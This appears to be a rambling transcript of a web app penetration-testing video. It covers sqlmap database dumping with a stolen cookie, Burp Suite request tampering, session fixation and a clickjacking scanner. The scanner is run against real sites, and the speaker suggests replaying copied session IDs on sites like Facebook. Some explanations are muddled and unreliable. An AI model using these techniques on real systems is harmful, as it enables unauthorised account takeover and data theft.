enter the cookie value. That's it. So let me show you here. So just type clear, we just type as SQL map minus URL. Let we would like to try here as, let me go to here as, go to artist. I just utilize this one. Let it paste here. Cookie equal to, so present the cookie value. So come back here, this one, copy the cookie value. This is the cookie value. That's it. Let it paste it here. Then minus dbs minus batch. That's it. So this is how you can get entire of the targeted website of the database. So you can use any type of platforms using the cookies, so that you can get entirely you can see might be injectable. So once you get the cookie identity, so even you can do multiple things. So you can import the cookies with the cookie editor, and you can refresh the browser, then you can get it automatically. So some of the hackers, they are trying to steal the cookies, and with the cookies also they can utilize that one to re-log in and try to manipulate or modify the data or anything else. That's it. So it may be working the tampering for a sign encryption cookies also. So it may take a little bit time. Now we would like to do as next is for source code analysis. So once you visit any one of the targeted website, you need to analyze which type of they have coded, like it was coded in the HTML, CSS, JavaScript, Node.js, otherwise React.js. So you need to understand what is their uh, uh, source of code. And if you analyze the targeted website, now I have this one. Let me, I just entirely just copy this one. Now let me, we would like to go back here. So just type here as exit. So just type here So I just type here as what web and let it paste. Now we can analyze what is this source code. Then if it is in Nginx, otherwise XYZ things, we can look here. So this was posted in the Nginx version is 1.19.0 that we have analyzed. So you can, based on this a source code, you can analyze and resource entire of the targeted of your website and find the loopholes. Then do the all possible ways, a reconnaissance, enumeration, exploitation, privilege escalation, and get the root privilege escalations. So for privilege escalations, we have used like PHP reversal, linpace, and some other exploits and known vulnerabilities and much more things. We have seen that all also. Then we have got that. So it may take a more little bit time. So SQL injection is not uh, will take a lot of time. It will be very easy, but it will time will be consumes a lot. Now we would like to go for another one is HTTP header modification. So let me just come back here. So we just use a Burp Suite. So we can if uh, any type of targeted website, you try to visit to the Facebook, otherwise any one of the targeted website. If you request and if the data, if you request something, if in the server the data is a response is there, then there if the data is there, then the targeted web browser that will check and they will respond to you back with the right result. If there is nothing else, it will not be get. So uh, HTTP header modification is like get and post method. So here we would like to look here, let it load. So let it load this one. So HTTP header modification refers to the process of altering the HTTP header that sends between client and the uh, browser and search for a HTTP headers, convey the information about what else you have requested. So I visit to the like web.whatsapp. They can ask me, scan your QR code. If I scan from my WhatsApp, okay, then that will check that data is available in the WhatsApp server. Then that will be give a response. That's it. So this is the same way, such as an authentication tokens, content types, user agent, and catching instructions, modifying HTTP header can be used both legitimate purpose like debugging, optimization, malicious actions, exploiting the vulnerabilities, all those things. So here we would like to look uh, HTTP header modifications, like client-side modifications, like user agent, cookie reference. User agent, like if you use any type of targeted browser, if the browser version is 4, like Mozilla 4, then if you change the file, then if the server is updated in the file, that will be accept only a file. And if your browser is 4, that will not give you a right result. Then response header modification, server-side modification like changing a HTTP response header before they reach the client. This often done by implementing the content security policy or strict transportation security headers. Also, we also look like header injections, cookie tampering, authorization bypass, cache poisoning, cross-site request, then cross-origin resource sharing, everything. Then legitimate use of header modification. Now we would like to go back to a proxy. Uh, let uh, I would like to log out this. Once this is logout is done, now let me log in here. Now try here as a uh, test. So before that, we just make it as interception is on. Now we would like to try to uh, get like a Burp Suite. Then click on login here. So where you got here as first, you have post your information to the server. Once you have post the information into your server, then you can forward the request. Then let's wait here. You get with a get response. Where is this? Here I noted get as a get response from here. So again, we would like to type here. So where is this? So we would like to log out. Now you can see here I got. So I want to get a logout. So now I got the get response. Where test.php.vulnerable. So and the parameter of the cookie ID. So where you have got it here. So using this get or post. So even you can change this one entirely like is this here. Change a request method. You can now we have a get, so we can change the request method to a post also. Here you can look here post. Now change a request method to get. That's it, get and post. This is how you can do the HTTP header modification. Now we would like to look as session fixation. So what is a session fixation? Session fixation is a type of attack where an attacker forces a trick in a victim into a predetermined session ID. Once the victim authenticates using the session ID, attackers who already know the session ID can hijack the authenticated session and gain unauthorized access to the victim's account or a data. Unlike a session hijacking, where the attacker steals the valid session ID after it's created a session fixation, focus on the manipulating of session ID before user logs in. So how this will be work? Like I have my targeted Facebook account. Okay, so in the Facebook, I have get a session identity. Like I just enter my user ID and password, and I get my session ID. Where a session ID will come like 1, 2, 3, 4, 5, 6, otherwise alphanumerical or otherwise something else. So we would like to look here as a session. We would like to show you here. Uh, we would like to go to guest book. So here we not get anything else. Uh, we would like to look as a now we would like to take this artist. We would like to go here. So I just come back to again to a Burp Suite. Then we just make it off, then make it on. So let me refresh this. So upgrade a request equal to 1. Now here I have somewhat. So I try to send in the repeater. In the repeater, you would like to look here. Try to send this where PHP event to where we would like to look here. So connection is keep alive. So here I noted get session fixation. So that may be and get a large type of domains like with the Google Cloud or AWS Amazon. There you have get the your session fixation. So once you get that session fixation, now you directly copy the session fixation. Then you try to get the change the session fixation into in any one of the targeted website. Like let we would like to look here how it's easily will be done like a session fixation. So where now let me I don't want to go from here. Now let me I try here to I would like to disable this. Now let here is let me I just try to log out from here. Once we would like to log out here, there. Now go to a sign up. Now I want to create an account here. So username is I would like to type here as PCPR. Password is 1234. 1234. Name PCPR Alex. Now credit card number. So 9876543321. Then email PCPL Alex @123.com. Phone number is 0987654321. Address. So I just put a normal. So let me I just create here. So you have been introduced our new database with a new username. So you can log in with this PCPL password with 123. Let me try to log in here. So try to log in here as PCPL, then username as 1234. So we just try here as PCPL 1234. So it even if it go as a test only, why it will give like this here. So how I would like to show you a simple and easy way to show you here. So we just click on the inspect elements. Now go to add storage. Now once you have got the session identity of the value of the targeted website, so you just need to enter that value here. That's it. So if you change the value, you can directly uh, log in over to there. That's it. So sign up is disabled. Please use only the test and password. That's it. So here is only one username. That's a little bit complicated to do this a session fixation. So you can try in another targeted website like a Facebook, otherwise XYZ thing. So if you have copied the session ID, so where you get to the targeted web server at your browser or the client ID, there is a session ID that will be present. So if you copy the session ID, you can replace the session ID here. You can directly log in into the targeted website. So this is how you can do a session fixation. Now we are going to do as clickjacking POC. we would like to come back here. So just type here as clickjack POC. Clickjacking, a proof of concept, is demonstrate how attacker can trick a user into a clicking a some other than a user. Uh, so we would like to. This is the clickjacking. So an attacker uses clickjacking to check uh, any type of targeted website is directly clone and check that is vulnerable. The attacker embeds a legitimate page inside as invisible. Here, clickjacking vulnerability scanner. So we just try to look here, just copy the source code. So we just copy the source code. So where we have identified here, you can look here, accurate and information. So it will take a lot of lengthy time. So to process all those things here with a cookie modification. So we just type here as git clone, let it paste here, clickjack POC. So now we would like to go to as cd a clickjack POC type plus. So first we would like to install pip3 install minus our requirements.txt. Let it install the requirements.txt. So the victim visits the malicious site, which is usually the legitimate page by placing its beneath a set of seemingly inconscious buttons or links. When the victims click on elements and see the buttons are labeled download, they are actually interacting with the invisible iframe. We are going to get this. Get, we just type here as clear. So just type here as button 3. Clickjack poc.python -l. So I just need to enter as nano urls.txt. Let me, I just enter with https.github.com, https.tryhackme.com, https. So I want to enter some other targeted website like google.com, https.yahoo.com. So let me enter https. We would like to go with we would like to go with we would like to go with as which type of targeted website we would like to here. Hack the box.com, https. Then we try here as oneweb.com. So it is not with https, with http only. Test php.oneweb.com. That's it. So just type Ctrl O, Ctrl X. So just type cat urls.txt where I have got the URL. So just type clear. Now we just type here as file urls.txt. Let this will start now, and then we would like to visit the targeted web browser. So let me close this. Then let me open the clickjacking folder. So where I have got the result, hack the box, test.php. So let me open this API box. You can look here in the iframe of the targeted website. where a clickjack POC is one of the targeted website. Then you can also look here at test.php, open with the Firefox. So it will take a little bit time to load in this iframes. Okay, now we try here as open with as Firefox. That's it. I think we not yet get anything else. So uh, the target is vulnerable. The target is vulnerable. The target is not vulnerable as GitHub is not vulnerable for clickjacking POC. Hack the box is vulnerable for this one. Tryhackme.com is unreachable. Error 2. So if that is game, it's also a vulnerable. Now what else we have got here? This clickjacking. So where you get here, look here, hack the box, Aconetics web vulnerability scanner. So this is in the iframe. So what else you have seen here? Buttons are XYZ things. It is just not. It will directly work in the iframe from the local host entirely. That's it. So this is how clickjacking POC is workable. So the victim visits in the attacker's page. The visible or downloaded buttons uh, in the that will work under attacker's control. So this is the set. So we have successfully completed the advanced web app penetration testing. So that's it. So I hope you enjoyed these tutorials. So you try it your own guys. Thank you guys for watching and keep smiling.